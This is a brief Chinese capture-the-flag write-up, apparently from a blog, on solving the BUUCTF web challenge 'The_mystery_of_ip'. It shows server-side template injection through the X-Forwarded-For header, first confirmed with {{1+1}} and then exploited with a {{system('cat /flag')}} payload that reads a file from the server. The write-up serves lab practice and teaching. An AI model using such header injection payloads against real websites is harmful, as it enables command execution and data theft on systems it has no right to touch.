常规思路,跟ip有关的无非就是那么几个HTTP头
试一下最常规的XFF头,果然是,同样跟IP有关的是SSTI
访问flag.php,加头:
X-Forwarded-For:127.0.0.1
回显127.0.0.1,XFF验证
X-Forwarded-For:127.0.0.1{{1+1}}
回显:127.0.0.12,SSTI实锤
那么尝试system,没被禁,好办了
更正一下,根目录访问目录被关了,不会回显的,毕竟是真实的网站,当前目录还是有访问权限的
猜吧,flag在/
拿flag:
X-Forwarded-For:127.0.0.1{{system(‘cat /flag’)}}
参考视频链接:https://www.bilibili.com/video/BV1FY411x7ko/
BUUCTF WEB The_mystery_of_ip
最新推荐文章于 2023-03-05 21:44:27 发布